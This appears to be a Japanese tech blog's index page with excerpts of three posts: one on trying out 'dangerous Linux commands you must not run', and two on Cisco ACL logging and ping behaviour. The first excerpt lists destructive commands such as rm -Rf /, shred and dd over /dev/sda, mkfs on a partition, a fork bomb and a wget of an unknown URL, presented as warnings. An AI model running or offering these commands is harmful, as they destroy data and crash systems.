実行してはいけないコマンドを実行してみる

先日、「実行してはいけない危険なLinuxコマンド10選」というニュースが話題になった。 紹介されているコマンドは下記10コマンド。 rm -Rf / shred /dev/sda dd if=/dev/random of=/dev/sda mkfs.ext4 /dev/sda1 mv / /dev/null :(){:|:&};: wget http://unknown…

続きを読む

ACLのdenyログにポート番号を表示させる

CiscoのACLでlogオプションを使用するとSyslogに出力することができる。 このログ出力は、ACLの指定の仕方で一部内容が変わってくるので注意が必要。 例えば、下記のようなACLエントリがある場合。 access-list 101 permit ip host 192.168.1.1 host 192.168.2.1 access-list 101 deny ip …

続きを読む

同セグのL3スイッチのIPへPINGが通らない

同セグからのPINGなのに、CiscoのL3スイッチのSVIのIPへPINGが通らないことがある。 ただ単にACLの掛け方が悪いのであるが、同セグなのに弾かれる理由が分からなかった。 例えば下記のような場合である。 端末Aから端末BへのPINGは、ACLで許可していなくても問題なく通る。 しかし、端末A(またはB)からL3スイッチのSVIのIPへPINGを打つと、 なぜ…

続きを読む

人気記事